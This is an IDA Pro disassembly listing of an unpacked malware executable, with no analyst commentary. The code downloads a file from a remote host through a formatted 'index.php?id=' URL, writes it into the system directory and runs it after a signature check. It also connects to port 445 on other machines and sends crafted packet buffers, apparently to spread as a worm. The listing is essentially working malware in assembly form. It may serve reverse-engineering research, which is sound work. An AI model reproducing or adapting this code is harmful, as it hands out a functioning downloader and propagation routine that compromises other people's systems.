;
; +-------------------------------------------------------------------------+
; | This file is generated by The Interactive Disassembler (IDA) |
; | Copyright (c) 2007 by DataRescue sa/nv, <ida@datarescue.com> |
; | Licensed to: SRI, 1 computer, std, 05/2007 |
; +-------------------------------------------------------------------------+
;
;
; +-------------------------------------------------------------------------+
; | This file is generated by The Interactive Disassembler (IDA) |
; | Copyright (c) 2007 by DataRescue sa/nv, <ida@datarescue.com> |
; | Licensed to: SRI, 1 computer, std, 05/2007 |
; +-------------------------------------------------------------------------+
;
; Input MD5 : AE590430C5BE80DBD519D9526C8BF588
; File Name : u:\work\ae590430c5be80dbd519d9526c8bf588_unpacked.exe
; Format : Portable executable for 80386 (PE)
; Imagebase : 30900000
; Section 1. (virtual address 00001000)
; Virtual size : 00004000 ( 16384.)
; Section size in file : 00004000 ( 16384.)
; Offset to raw data for section: 00001000
; Flags E0000080: Bss Executable Readable Writable
; Alignment : default
unicode macro page,string,zero
irpc c,<string>
db '&c', page
endm
ifnb <zero>
dw zero
endif
endm
.686p
.mmx
.model flat
; ===========================================================================
; Segment type: Pure code
; Segment permissions: Read/Write/Execute
UPX0 segment para public 'CODE' use32
assume cs:UPX0
;org 30901000h
assume es:nothing, ss:nothing, ds:UPX0, fs:nothing, gs:nothing
dword_30901000 dd 77DDEAF4h ; resolved to->ADVAPI32.RegCreateKeyExAdword_30901004 dd 77DDEBE7h ; resolved to->ADVAPI32.RegSetValueExAdword_30901008 dd 77DD7883h ; resolved to->ADVAPI32.RegQueryValueExAdword_3090100C dd 77DD761Bh ; resolved to->ADVAPI32.RegOpenKeyExA ; sub_30902859+1D�r
dword_30901010 dd 77DDEDE5h ; resolved to->ADVAPI32.RegDeleteValueAdword_30901014 dd 77DD6BF0h ; resolved to->ADVAPI32.RegCloseKey ; sub_30902859+4E�r ...
dword_30901018 dd 77E34D78h ; resolved to->ADVAPI32.AbortSystemShutdownAdword_3090101C dd 77DEA2F9h ; resolved to->ADVAPI32.CryptCreateHashdword_30901020 dd 77DEA122h ; resolved to->ADVAPI32.CryptHashDatadword_30901024 dd 77DEAB80h ; resolved to->ADVAPI32.CryptVerifySignatureAdword_30901028 dd 77DEA254h ; resolved to->ADVAPI32.CryptDestroyHashdword_3090102C dd 77DEA544h ; resolved to->ADVAPI32.CryptDestroyKeydword_30901030 dd 77DE8546h ; resolved to->ADVAPI32.CryptReleaseContextdword_30901034 dd 77DE7F96h ; resolved to->ADVAPI32.CryptAcquireContextAdword_30901038 dd 77DEA879h ; resolved to->ADVAPI32.CryptImportKey align 10h
dword_30901040 dd 7C809AE4h ; resolved to->KERNEL32.VirtualFreedword_30901044 dd 7C809A51h ; resolved to->KERNEL32.VirtualAllocdword_30901048 dd 7C80B4CFh ; resolved to->KERNEL32.GetModuleFileNameAdword_3090104C dd 7C80BAA1h ; resolved to->KERNEL32.lstrcmpiAdword_30901050 dd 7C8286EEh ; resolved to->KERNEL32.CopyFileAdword_30901054 dd 7C86136Dh ; resolved to->KERNEL32.WinExecdword_30901058 dd 7C864B0Fh ; resolved to->KERNEL32.CreateToolhelp32Snapshotdword_3090105C dd 7C863DE5h ; resolved to->KERNEL32.Process32Firstdword_30901060 dd 7C801E16h ; resolved to->KERNEL32.TerminateProcessdword_30901064 dd 7C863F58h ; resolved to->KERNEL32.Process32Nextdword_30901068 dd 7C80BE01h ; resolved to->KERNEL32.lstrcpyA ; sub_30902B37+8F�r
dword_3090106C dd 7C8308ADh ; resolved to->KERNEL32.CreateEventAdword_30901070 dd 7C802520h ; resolved to->KERNEL32.WaitForSingleObjectdword_30901074 dd 7C831EABh ; resolved to->KERNEL32.DeleteFileA ; sub_30902A6B+F�r
dword_30901078 dd 7C810D87h ; resolved to->KERNEL32.WriteFiledword_3090107C dd 7C809B47h ; resolved to->KERNEL32.CloseHandle ; sub_309011A0+F6�r ...
dword_30901080 dd 7C801A24h ; resolved to->KERNEL32.CreateFileA ; sub_30902195+57�r
dword_30901084 dd 7C80BDB6h ; resolved to->KERNEL32.lstrlenA ; sub_30901422+64�r ...
dword_30901088 dd 7C834D41h ; resolved to->KERNEL32.lstrcatA ; sub_30902A6B+40�r
dword_3090108C dd 7C814EEAh ; resolved to->KERNEL32.GetSystemDirectoryA ; sub_30902A6B+1B�r
dword_30901090 dd 7C80D262h ; resolved to->KERNEL32.GetLocaleInfoAdword_30901094 dd 7C802442h ; resolved to->KERNEL32.Sleep ; sub_309017D2+16C�r ...
dword_30901098 dd 7C80978Eh ; resolved to->KERNEL32.InterlockedExchangedword_3090109C dd 7C810111h ; resolved to->KERNEL32.lstrcpynAdword_309010A0 dd 7C80DDF5h ; resolved to->KERNEL32.GetCurrentProcessdword_309010A4 dd 7C80ADA0h ; resolved to->KERNEL32.GetProcAddress ; sub_30901DC1+2C�r
dword_309010A8 dd 7C801D77h ; resolved to->KERNEL32.LoadLibraryA ; sub_30902383+11C�r
dword_309010AC dd 7C80220Fh ; resolved to->KERNEL32.WriteProcessMemorydword_309010B0 dd 7C8309E1h ; resolved to->KERNEL32.OpenProcess ; sub_30902905+92�r
dword_309010B4 dd 7C80B6A1h ; resolved to->KERNEL32.GetModuleHandleA ; UPX0:30902307�r
dword_309010B8 dd 7C80929Ch ; resolved to->KERNEL32.GetTickCountdword_309010BC dd 7C80E93Fh ; resolved to->KERNEL32.CreateMutexAdword_309010C0 dd 7C810637h ; resolved to->KERNEL32.CreateThread ; sub_30901F23+12�r
dword_309010C4 dd 7C802367h ; resolved to->KERNEL32.CreateProcessAdword_309010C8 dd 7C80A017h ; resolved to->KERNEL32.SetEventdword_309010CC dd 7C81320Ch ; resolved to->KERNEL32.OpenEventAdword_309010D0 dd 7C80C058h ; resolved to->KERNEL32.ExitThread ; sub_30902195+66�r ...
dword_309010D4 dd 7C809766h ; resolved to->KERNEL32.InterlockedIncrement ; sub_3090259A+3F�r ...
dword_309010D8 dd 7C80180Eh ; resolved to->KERNEL32.ReadFiledword_309010DC dd 7C810A77h ; resolved to->KERNEL32.GetFileSizedword_309010E0 dd 7C81CDDAh ; resolved to->KERNEL32.ExitProcess ; sub_30902A6B+C3�r
dword_309010E4 dd 7C910331h, 0 ; resolved to->NTDLL.RtlGetLastWin32Errordword_309010EC dd 77C371BCh ; resolved to->MSVCRT.sranddword_309010F0 dd 77C46F70h ; resolved to->MSVCRT.memcpydword_309010F4 dd 77C478A0h ; resolved to->MSVCRT.strlendword_309010F8 dd 77C475F0h ; resolved to->MSVCRT.memsetdword_309010FC dd 77C371D3h ; resolved to->MSVCRT.rand ; sub_30901F44:loc_30901F55�r ...
; ---------------------------------------------------------------------------
loc_30901100: ; DATA XREF: UPX0:loc_30902CA0�r
xchg eax, esp
pop esp
retn
; ---------------------------------------------------------------------------
db 77h
dword_30901104 dd 77C47C60h ; resolved to->MSVCRT.strstr ; sub_3090204F:loc_30902080�r ...
dword_30901108 dd 77C47660h ; resolved to->MSVCRT.strchr ; sub_30901422+AA�r
align 10h
dword_30901110 dd 7E42DE87h ; resolved to->USER32.FindWindowAdword_30901114 dd 7E41BE4Bh ; resolved to->USER32.GetForegroundWindowdword_30901118 dd 7E418A80h ; resolved to->USER32.GetWindowThreadProcessIddword_3090111C dd 7E41A8ADh ; resolved to->USER32.wsprintfA ; sub_309015C7+77�r ...
dd 0
dword_30901124 dd 42C30BFAh ; resolved to->WININET.InternetOpenUrlA ; sub_309015C7+9D�r
dword_30901128 dd 42C2C8A1h ; resolved to->WININET.InternetOpenA ; sub_309015C7+89�r
dword_3090112C dd 42C1DAC1h ; resolved to->WININET.InternetCloseHandledword_30901130 dd 42C367F6h ; resolved to->WININET.InternetGetConnectedState ; UPX0:30902779�r
dword_30901134 dd 42C2ABF4h ; resolved to->WININET.InternetReadFile ; sub_309015C7+B0�r
dd 0
dword_3090113C dd 71AB664Dh ; resolved to->WS2_32.WSAStartupdword_30901140 dd 71AB3E00h ; resolved to->WS2_32.binddword_30901144 dd 71AB88D3h ; resolved to->WS2_32.listendword_30901148 dd 71AC1028h ; resolved to->WS2_32.acceptdword_3090114C dd 71AB50C8h ; resolved to->WS2_32.gethostnamedword_30901150 dd 71AB94DCh ; resolved to->WS2_32.WSAGetLastErrordword_30901154 dd 71AB4FD4h ; resolved to->WS2_32.gethostbynamedword_30901158 dd 71AB3B91h ; resolved to->WS2_32.socket ; sub_30902195+AC�r
dword_3090115C dd 71AB3F41h ; resolved to->WS2_32.inet_ntoa ; sub_309026E9+D�r
dword_30901160 dd 71AB2B66h ; resolved to->WS2_32.ntohs ; sub_30902195+F0�r
dword_30901164 dd 71AB406Ah ; resolved to->WS2_32.connectdword_30901168 dd 71AB428Ah ; resolved to->WS2_32.send ; sub_3090204F+67�r ...
dword_3090116C dd 71AB615Ah ; resolved to->WS2_32.recv ; sub_309017D2+1D8�r ...
dword_30901170 dd 71AC0BDEh ; resolved to->WS2_32.shutdown ; sub_3090204F+128�r
dword_30901174 dd 71AB9639h ; resolved to->WS2_32.closesocket ; sub_3090204F+12F�r
align 10h
dword_30901180 dd 0FFFFFFFFh, 0 dd offset nullsub_1
align 10h
dword_30901190 dd 0FFFFFFFFh, 0 dd offset nullsub_2
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_309011A0 proc near ; CODE XREF: sub_30901422+16D�p
var_110 = byte ptr -110h
var_C = byte ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 110h
push ebx
push esi
xor esi, esi
push edi
push esi
push esi
push esi
push 1
push offset aMozilla4_0Comp ; "Mozilla/4.0 (compatible; MSIE 6.0; Wind"...
call dword_30901128 ; InternetOpenA
mov ebx, eax
cmp ebx, esi
jnz short loc_309011CB
push 1
jmp loc_30901261
; ---------------------------------------------------------------------------
loc_309011CB: ; CODE XREF: sub_309011A0+22�j
lea eax, [ebp+var_110]
push 104h
push eax
call dword_3090108C ; GetSystemDirectoryA
mov edi, dword_30901088
lea eax, [ebp+var_110]
push offset dword_309041F8
push eax
call edi ; lstrcatA
lea eax, [ebp+var_110]
push 6
push eax
call dword_30901084 ; lstrlenA
lea eax, [ebp+eax+var_110]
push eax
call sub_30901F44
pop ecx
lea eax, [ebp+var_110]
pop ecx
push offset dword_309041F0
push eax
call edi ; lstrcatA
push esi
push esi
push 2
push esi
push esi
lea eax, [ebp+var_110]
push 40000000h
push eax
call dword_30901080 ; CreateFileA
cmp eax, 0FFFFFFFFh
mov [ebp+var_4], eax
jnz short loc_30901241
push 2
jmp short loc_30901261
; ---------------------------------------------------------------------------
loc_30901241: ; CODE XREF: sub_309011A0+9B�j
push esi
push esi
push esi
push esi
push [ebp+arg_0]
push ebx
call dword_30901124 ; InternetOpenUrlA
cmp eax, esi
mov [ebp+arg_0], eax
jnz short loc_30901264
push [ebp+var_4]
call dword_3090107C ; CloseHandle
push 3
loc_30901261: ; CODE XREF: sub_309011A0+26�j
; sub_309011A0+9F�j
pop eax
jmp short loc_309012B5
; ---------------------------------------------------------------------------
loc_30901264: ; CODE XREF: sub_309011A0+B4�j
mov edi, 100000h
push edi
call sub_30902C75
mov ebx, eax
pop ecx
lea eax, [ebp+var_8]
push eax
push edi
push ebx
push [ebp+arg_0]
call dword_30901134 ; InternetReadFile
lea eax, [ebp+var_C]
push esi
push eax
push [ebp+var_8]
push ebx
push [ebp+var_4]
call dword_30901078 ; WriteFile
push [ebp+var_4]
call dword_3090107C ; CloseHandle
lea eax, [ebp+var_110]
push 5
push eax
call sub_30901F74
push ebx
call sub_30902C89
add esp, 0Ch
xor eax, eax
loc_309012B5: ; CODE XREF: sub_309011A0+C2�j
pop edi
pop esi
pop ebx
leave
retn
sub_309011A0 endp
; =============== S U B R O U T I N E =======================================
sub_309012BA proc near ; CODE XREF: sub_30901422+F8�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = byte ptr 0Ch
mov ecx, [esp+arg_4]
mov eax, [esp+arg_0]
push ebx
push esi
push edi
or edi, 0FFFFFFFFh
inc eax
push 0Fh
lea esi, [ecx+1]
sub edi, ecx
pop ecx
loc_309012D1: ; CODE XREF: sub_309012BA+56�j
mov dl, [eax]
mov bl, [eax-1]
add edx, ecx
add bl, cl
sar edx, 4
and dl, 3
sub dl, [esp+0Ch+arg_8]
shl bl, 2
or dl, bl
mov [esi-1], dl
mov dl, [eax+1]
mov bl, [eax]
dec dl
add bl, cl
and dl, cl
sub dl, [esp+0Ch+arg_8]
add eax, 3
shl bl, 4
and bl, 0F0h
or dl, bl
mov [esi], dl
inc esi
inc esi
lea edx, [edi+esi]
cmp edx, 30h
jl short loc_309012D1
pop edi
pop esi
pop ebx
retn
sub_309012BA endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_30901316 proc near ; CODE XREF: sub_3090139B+27�p
var_38 = byte ptr -38h
var_1C = byte ptr -1Ch
arg_0 = byte ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 38h
push ebx
push esi
push edi
push 6
pop ecx
mov esi, offset aAbcdefghijklmn ; "ABCDEFGHIJKLMNOPQRSTUVWXYZ"
lea edi, [ebp+var_1C]
push 6
rep movsd
movsw
movsb
pop ecx
mov esi, offset aAbcdefghijkl_0 ; "abcdefghijklmnopqrstuvwxyz"
lea edi, [ebp+var_38]
mov ebx, [ebp+arg_4]
rep movsd
movsw
test ebx, ebx
movsb
jge short loc_30901349
add ebx, 1Ah
loc_30901349: ; CODE XREF: sub_30901316+2E�j
movsx edi, [ebp+arg_0]
mov esi, dword_30901108
lea eax, [ebp+var_1C]
push edi
push eax
call esi ; strchr
pop ecx
test eax, eax
pop ecx
jz short loc_30901373
lea ecx, [ebp+var_1C]
push 1Ah
sub eax, ecx
pop ecx
add eax, ebx
cdq
idiv ecx
mov al, [ebp+edx+var_1C]
jmp short loc_30901396
; ---------------------------------------------------------------------------
loc_30901373: ; CODE XREF: sub_30901316+48�j
lea eax, [ebp+var_38]
push edi
push eax
call esi ; strchr
pop ecx
test eax, eax
pop ecx
jz short loc_30901393
lea ecx, [ebp+var_38]
push 1Ah
sub eax, ecx
pop ecx
add eax, ebx
cdq
idiv ecx
mov al, [ebp+edx+var_38]
jmp short loc_30901396
; ---------------------------------------------------------------------------
loc_30901393: ; CODE XREF: sub_30901316+68�j
mov al, [ebp+arg_0]
loc_30901396: ; CODE XREF: sub_30901316+5B�j
; sub_30901316+7B�j
pop edi
pop esi
pop ebx
leave
retn
sub_30901316 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_3090139B proc near ; CODE XREF: sub_30901422+D6�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
mov eax, [ebp+arg_4]
push esi
mov esi, [ebp+arg_8]
push edi
mov al, [eax]
test al, al
jz short loc_309013F8
mov edi, [ebp+arg_0]
push ebx
loc_309013B0: ; CODE XREF: sub_3090139B+58�j
sub al, 2
inc [ebp+arg_4]
mov bl, al
mov eax, esi
neg eax
mov byte ptr [ebp+arg_0], bl
push eax
push [ebp+arg_0]
call sub_30901316
mov [edi], al
pop ecx
inc edi
cmp bl, 61h
pop ecx
jl short loc_309013DC
cmp bl, 7Ah
jg short loc_309013DC
movsx esi, bl
sub esi, 61h
loc_309013DC: ; CODE XREF: sub_3090139B+34�j
; sub_3090139B+39�j
cmp bl, 41h
jl short loc_309013EC
cmp bl, 5Ah
jg short loc_309013EC
movsx esi, bl
sub esi, 41h
loc_309013EC: ; CODE XREF: sub_3090139B+44�j
; sub_3090139B+49�j
mov eax, [ebp+arg_4]
mov al, [eax]
test al, al
jnz short loc_309013B0
pop ebx
jmp short loc_309013FB
; ---------------------------------------------------------------------------
loc_309013F8: ; CODE XREF: sub_3090139B+F�j
mov edi, [ebp+arg_0]
loc_309013FB: ; CODE XREF: sub_3090139B+5B�j
and byte ptr [edi], 0
pop edi
pop esi
pop ebp
retn
sub_3090139B endp
; =============== S U B R O U T I N E =======================================
sub_30901402 proc near ; CODE XREF: sub_30901422+104�p
arg_0 = dword ptr 4
xor eax, eax
xor ecx, ecx
loc_30901406: ; CODE XREF: sub_30901402+12�j
mov edx, [esp+arg_0]
movzx edx, byte ptr [ecx+edx]
add eax, edx
inc ecx
cmp ecx, 30h
jl short loc_30901406
push 1Ah
cdq
pop ecx
idiv ecx
mov eax, edx
add eax, 61h
retn
sub_30901402 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_30901422 proc near ; CODE XREF: sub_309015C7+B7�p
var_174 = dword ptr -174h
var_170 = byte ptr -170h
var_168 = byte ptr -168h
var_164 = byte ptr -164h
var_134 = dword ptr -134h
var_130 = dword ptr -130h
var_12C = dword ptr -12Ch
var_128 = dword ptr -128h
var_124 = byte ptr -124h
var_11C = byte ptr -11Ch
var_1C = dword ptr -1Ch
var_10 = dword ptr -10h
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset dword_30901180
push offset loc_30902CA0
mov eax, large fs:0
push eax
mov large fs:0, esp
sub esp, 164h
push ebx
push esi
push edi
mov [ebp+var_128], 1
and [ebp+var_4], 0
push offset aZer0 ; "zer0"
push [ebp+arg_0]
call dword_30901104 ; strstr
pop ecx
pop ecx
mov edi, eax
mov [ebp+var_130], edi
test edi, edi
jz loc_309015A8
add edi, 4
mov [ebp+var_130], edi
jz loc_309015A8
push edi
call dword_30901084 ; lstrlenA
mov [ebp+var_1C], eax
cmp eax, 50h
jle loc_309015A8
and byte ptr [edi+100h], 0
mov al, [edi]
mov [ebp+var_168], al
movsx ebx, al
sub ebx, 61h
mov [ebp+var_12C], ebx
js loc_309015A8
cmp ebx, 1Ah
jge loc_309015A8
inc edi
mov [ebp+var_130], edi
push 7Eh
push edi
call dword_30901108 ; strchr
pop ecx
pop ecx
mov esi, eax
mov [ebp+var_134], esi
test esi, esi
jz loc_309015A8
mov al, [esi]
mov [ebp+var_170], al
and byte ptr [esi], 0
push ebx
push edi
lea eax, [ebp+var_11C]
push eax
call sub_3090139B
mov al, [ebp+var_170]
mov [esi], al
inc esi
mov [ebp+var_130], esi
xor edi, edi
push edi
lea eax, [ebp+var_164]
push eax
lea eax, [esi+1]
push eax
call sub_309012BA
lea eax, [ebp+var_164]
push eax
call sub_30901402
add esp, 1Ch
cmp [esi], al
jnz short loc_309015A8
push 44h
push offset dword_30904000
lea eax, [ebp+var_124]
push eax
call sub_30901700
add esp, 0Ch
lea eax, [ebp+var_174]
push eax
push 30h
lea eax, [ebp+var_164]
push eax
lea eax, [ebp+var_11C]
push eax
call dword_30901084 ; lstrlenA
push eax
lea eax, [ebp+var_11C]
push eax
lea eax, [ebp+var_124]
push eax
call sub_3090176B
add esp, 18h
test eax, eax
jnz short loc_3090159B
cmp [ebp+var_174], edi
jz short loc_3090159B
lea eax, [ebp+var_11C]
push eax
call sub_309011A0
pop ecx
mov [ebp+var_128], edi
loc_3090159B: ; CODE XREF: sub_30901422+15C�j
; sub_30901422+164�j
lea eax, [ebp+var_124]
push eax
call sub_3090174F
pop ecx
loc_309015A8: ; CODE XREF: sub_30901422+4E�j
; sub_30901422+5D�j ...
or [ebp+var_4], 0FFFFFFFFh
call nullsub_1
mov eax, [ebp+var_128]
mov ecx, [ebp+var_10]
mov large fs:0, ecx
pop edi
pop esi
pop ebx
leave
retn
sub_30901422 endp
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_1. PRESS KEYPAD "+" TO EXPAND]
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_309015C7 proc near ; CODE XREF: sub_3090169C+1B�p
var_E8 = byte ptr -0E8h
var_84 = byte ptr -84h
var_4 = byte ptr -4
arg_0 = dword ptr 8
arg_4 = byte ptr 0Ch
push ebp
mov ebp, esp
sub esp, 0E8h
push ebx
push esi
push edi
push 4000h
call sub_30902C75
pop ecx
mov esi, eax
lea eax, [ebp+var_E8]
push 63h
push eax
push 7
push 400h
call dword_30901090 ; GetLocaleInfoA
xor ebx, ebx
cmp [ebp+arg_4], bl
jz short loc_3090162F
lea eax, [ebp+var_E8]
push eax
lea eax, [ebp+var_84]
push dword_30904FBC
push dword_30904FD4
push offset aFgnsdrjyrsert ; "fgnsdrjyrsert"
push [ebp+arg_0]
push offset aHttpSIndex_php ; "http://%s/index.php?id=%s&scn=%d&inf=%d"...
push eax
call dword_3090111C ; wsprintfA
add esp, 1Ch
jmp short loc_30901647
; ---------------------------------------------------------------------------
loc_3090162F: ; CODE XREF: sub_309015C7+34�j
push [ebp+arg_0]
lea eax, [ebp+var_84]
push offset aHttpS ; "http://%s"
push eax
call dword_3090111C ; wsprintfA
add esp, 0Ch
loc_30901647: ; CODE XREF: sub_309015C7+66�j
push ebx
push ebx
push ebx
push ebx
push offset aMozilla4_0Co_0 ; "Mozilla/4.0 (compatible; MSIE 6.0; Wind"...
call dword_30901128 ; InternetOpenA
push ebx
mov edi, eax
push ebx
push ebx
lea eax, [ebp+var_84]
push ebx
push eax
push edi
call dword_30901124 ; InternetOpenUrlA
mov ebx, eax
lea eax, [ebp+var_4]
push eax
push 2000h
push esi
push ebx
call dword_30901134 ; InternetReadFile
push esi
call sub_30901422
push esi
call sub_30902C89
mov esi, dword_3090112C
pop ecx
pop ecx
push ebx
call esi ; InternetCloseHandle
push edi
call esi ; InternetCloseHandle
pop edi
pop esi
pop ebx
leave
retn
sub_309015C7 endp
; =============== S U B R O U T I N E =======================================
; Attributes: noreturn
sub_3090169C proc near ; DATA XREF: sub_30902383+161�o
push esi
push edi
mov edi, dword_30901098
loc_309016A4: ; CODE XREF: sub_3090169C+62�j
xor esi, esi
loc_309016A6: ; CODE XREF: sub_3090169C+4E�j
inc esi
inc esi
mov al, byte_30904080[esi+esi*4]
push eax
push off_30904081[esi+esi*4]
call sub_309015C7
pop ecx
pop ecx
call dword_309010FC ; rand
push 3
cdq
pop ecx
idiv ecx
add esi, edx
call sub_30902039
xor edx, edx
mov ecx, 493E0h
div ecx
add edx, 61B48h
push edx
call dword_30901094 ; Sleep
cmp esi, 16h
jb short loc_309016A6
push 0
push offset dword_30904FD4
call edi ; InterlockedExchange
push 0
push offset dword_30904FBC
call edi ; InterlockedExchange
jmp short loc_309016A4
sub_3090169C endp
; =============== S U B R O U T I N E =======================================
sub_30901700 proc near ; CODE XREF: sub_30901422+11E�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
push ebx
mov ebx, [esp+4+arg_0]
push esi
mov esi, dword_30901034
push edi
xor edi, edi
push edi
push 1
push edi
push edi
push ebx
call esi ; CryptAcquireContextA
test eax, eax
jnz short loc_3090172D
push 8
push 1
push edi
push edi
push ebx
call esi ; CryptAcquireContextA
test eax, eax
jnz short loc_3090172D
push 1
pop eax
jmp short loc_3090174B
; ---------------------------------------------------------------------------
loc_3090172D: ; CODE XREF: sub_30901700+19�j
; sub_30901700+26�j
lea eax, [ebx+4]
push eax
push edi
push edi
push [esp+18h+arg_8]
push [esp+1Ch+arg_4]
push dword ptr [ebx]
call dword_30901038 ; CryptImportKey
neg eax
sbb eax, eax
and al, 0FEh
inc eax
inc eax
loc_3090174B: ; CODE XREF: sub_30901700+2B�j
pop edi
pop esi
pop ebx
retn
sub_30901700 endp
; =============== S U B R O U T I N E =======================================
sub_3090174F proc near ; CODE XREF: sub_30901422+180�p
arg_0 = dword ptr 4
push esi
mov esi, [esp+4+arg_0]
push dword ptr [esi+4]
call dword_3090102C ; CryptDestroyKey
push 0
push dword ptr [esi]
call dword_30901030 ; CryptReleaseContext
xor eax, eax
pop esi
retn
sub_3090174F endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_3090176B proc near ; CODE XREF: sub_30901422+152�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
push ebp
mov ebp, esp
push esi
mov esi, [ebp+arg_0]
push edi
lea eax, [ebp+arg_0]
xor edi, edi
push eax
push edi
push edi
push 8003h
push dword ptr [esi]
call dword_3090101C ; CryptCreateHash
test eax, eax
jnz short loc_30901791
push 1
pop eax
jmp short loc_309017CE
; ---------------------------------------------------------------------------
loc_30901791: ; CODE XREF: sub_3090176B+1F�j
push edi
push [ebp+arg_8]
push [ebp+arg_4]
push [ebp+arg_0]
call dword_30901020 ; CryptHashData
test eax, eax
jnz short loc_309017AA
push 2
pop edi
jmp short loc_309017C3
; ---------------------------------------------------------------------------
loc_309017AA: ; CODE XREF: sub_3090176B+38�j
push edi
push edi
push dword ptr [esi+4]
push [ebp+arg_10]
push [ebp+arg_C]
push [ebp+arg_0]
call dword_30901024 ; CryptVerifySignatureA
mov ecx, [ebp+arg_14]
mov [ecx], eax
loc_309017C3: ; CODE XREF: sub_3090176B+3D�j
push [ebp+arg_0]
call dword_30901028 ; CryptDestroyHash
mov eax, edi
loc_309017CE: ; CODE XREF: sub_3090176B+24�j
pop edi
pop esi
pop ebp
retn
sub_3090176B endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_309017D2 proc near ; CODE XREF: sub_30902536+36�p
; sub_3090259A+48�p ...
var_89E4 = byte ptr -89E4h
var_897C = byte ptr -897Ch
var_690C = byte ptr -690Ch
var_689C = byte ptr -689Ch
var_5DD8 = byte ptr -5DD8h
var_4834 = byte ptr -4834h
var_4833 = byte ptr -4833h
var_37A0 = byte ptr -37A0h
var_2CDC = byte ptr -2CDCh
var_2CDB = byte ptr -2CDBh
var_2CD8 = byte ptr -2CD8h
var_24F4 = byte ptr -24F4h
var_24E4 = byte ptr -24E4h
var_21C0 = byte ptr -21C0h
var_21BC = byte ptr -21BCh
var_21B0 = byte ptr -21B0h
var_1F28 = byte ptr -1F28h
var_1EAC = byte ptr -1EACh
var_16DC = byte ptr -16DCh
var_1231 = byte ptr -1231h
var_F44 = byte ptr -0F44h
var_EA4 = byte ptr -0EA4h
var_798 = dword ptr -798h
var_788 = byte ptr -788h
var_774 = byte ptr -774h
var_730 = byte ptr -730h
var_134 = byte ptr -134h
var_133 = byte ptr -133h
var_E4 = byte ptr -0E4h
var_E1 = byte ptr -0E1h
var_B7 = byte ptr -0B7h
var_B5 = byte ptr -0B5h
var_B4 = byte ptr -0B4h
var_6C = byte ptr -6Ch
var_4C = byte ptr -4Ch
var_24 = word ptr -24h
var_22 = word ptr -22h
var_20 = dword ptr -20h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_6 = byte ptr -6
var_5 = byte ptr -5
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
mov eax, 89E4h
call sub_30902CC0
mov eax, dword_30904C84
push ebx
push edi
push 1
pop edi
xor ebx, ebx
mov [ebp+var_14], eax
mov eax, dword_30904C88
push ebx
push edi
push 2
mov [ebp+var_10], eax
mov [ebp+var_C], edi
call dword_30901158 ; socket
cmp eax, 0FFFFFFFFh
mov [ebp+var_4], eax
jz loc_30901D32
push esi
mov esi, [ebp+arg_0]
push 1Dh
push esi
call dword_3090115C ; inet_ntoa
push eax
lea eax, [ebp+var_6C]
push eax
call dword_3090109C ; lstrcpynA
lea eax, [ebp+var_6C]
push eax
lea eax, [ebp+var_4C]
push offset loc_30904C78
push eax
call dword_3090111C ; wsprintfA
add esp, 0Ch
xor ecx, ecx
lea eax, [ebp+var_133]
loc_30901845: ; CODE XREF: sub_309017D2+83�j
mov dl, [ebp+ecx+var_4C]
mov [eax-1], dl
and byte ptr [eax], 0
inc ecx
inc eax
inc eax
cmp ecx, 28h
jl short loc_30901845
push 60h
lea eax, [ebp+var_E4]
push offset dword_30904798
push eax
call sub_30902CB2 ; memcpy
lea eax, [ebp+var_4C]
push eax
call sub_30902CAC ; strlen
shl eax, 1
push eax
lea eax, [ebp+var_134]
push eax
lea eax, [ebp+var_B4]
push eax
call sub_30902CB2 ; memcpy
add esp, 1Ch
lea eax, [ebp+var_4C]
push 9
push (offset aC+3)
push eax
call sub_30902CAC ; strlen
pop ecx
lea eax, [ebp+eax*2+var_B5]
push eax
call sub_30902CB2 ; memcpy
lea eax, [ebp+var_4C]
push eax
call sub_30902CAC ; strlen
add al, 1Ah
push edi
shl al, 1
mov [ebp+var_5], al
lea eax, [ebp+var_5]
push eax
lea eax, [ebp+var_E1]
push eax
call sub_30902CB2 ; memcpy
lea eax, [ebp+var_4C]
push eax
call sub_30902CAC ; strlen
shl al, 1
add al, 9
push edi
mov [ebp+var_6], al
lea eax, [ebp+var_6]
push eax
lea eax, [ebp+var_B7]
push eax
call sub_30902CB2 ; memcpy
push 0E29h
lea eax, [ebp+var_1F28]
push 31h
push eax
call sub_30902CA6 ; memset
push 10h
lea eax, [ebp+var_24]
push ebx
push eax
call sub_30902CA6 ; memset
add esp, 44h
mov [ebp+var_24], 2
push 1BDh
call dword_30901160 ; ntohs
mov [ebp+var_22], ax
lea eax, [ebp+var_24]
push 10h
push eax
push [ebp+var_4]
mov [ebp+var_20], esi
call dword_30901164 ; connect
cmp eax, 0FFFFFFFFh
jz loc_30901D28
mov esi, dword_30901094
mov edi, 0C8h
push edi
call esi ; Sleep
push ebx
mov ebx, dword_30901168
push 89h
push offset dword_30904580
push [ebp+var_4]
call ebx ; send
push edi
call esi ; Sleep
push 0
lea eax, [ebp+var_774]
push 640h
push eax
push [ebp+var_4]
call dword_3090116C ; recv
cmp eax, 0FFFFFFFFh
jz loc_30901D1D
push 0
push 0A8h
push offset dword_3090460C
push [ebp+var_4]
call ebx ; send
push edi
call esi ; Sleep
push 0
lea eax, [ebp+var_774]
push 640h
push eax
push [ebp+var_4]
call dword_3090116C ; recv
